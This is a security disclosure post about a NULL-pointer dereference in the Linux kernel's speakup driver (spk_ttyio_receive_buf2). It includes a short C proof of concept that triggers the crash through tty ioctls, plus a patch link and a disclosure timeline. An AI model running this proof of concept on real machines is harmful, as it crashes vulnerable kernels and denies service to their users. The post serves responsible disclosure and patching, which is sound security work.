Linux kernel NULL-ptr deref bug in spk_ttyio_receive_buf2

[Shisong Qin <qinshisong1205 () gmail com>]

Hi,

Recently we found another NULL-ptr deref BUG in spk_ttyio.c in the latest
Linux kernel(5.9.11 is the latest at that now). In the
spk_ttyio_receive_buf2() function, it would dereference spk_ttyio_synth
without checking whether it is NULL or not, and may lead to a NULL-ptr
deref crash.

This bug could be reproduced in the Linux kernel (e.g. 5.9.11) with
CONFIG_ACCESSIBILITY=y, CONFIG_SPEAKUP=y and CONFIG_KASAN=y, and here is a
simple poc:

#define _GNU_SOURCE

#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#pragma pack(1)
typedef struct {
        char subcode;
        short xs, ys, xe, ye;
        short sel_mode;
} sel_struct;

int main(int argc, char const *argv[]) {

    int disc = 0x1a;
    int fd = open("/dev/tty1", 0, 0);
    ioctl(fd, 0x5423, &disc);

    sel_struct sel;
    sel.subcode = 2;
    sel.xs = sel.ys = sel.xe = sel.ye = 0;
    sel.sel_mode = 0x0; // sel_mode = 0x0/0x1/0x2 could trigger this
NULL-ptr dereference bug
    ioctl(fd, 0x541c, &sel);
    char data = 3;
    ioctl(fd, 0x541c, &data);
    return 0;
}

Here is the commit to patch this BUG:
https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/char-misc.git/commit/?h=char-misc-linus&id=f0992098cadb4c9c6a00703b66cafe604e178fea

Timeline:
* 2020/11/24 - Vulnerability reported to security () kernel org
* 2020/11/29 - Vulnerability confirmed, and reported to
linux-distros () vs openwall org.
* 2020/12/7 - Vulnerability opened.

Thanks, Shisong Qin and Bodong Zhao, Tsinghua University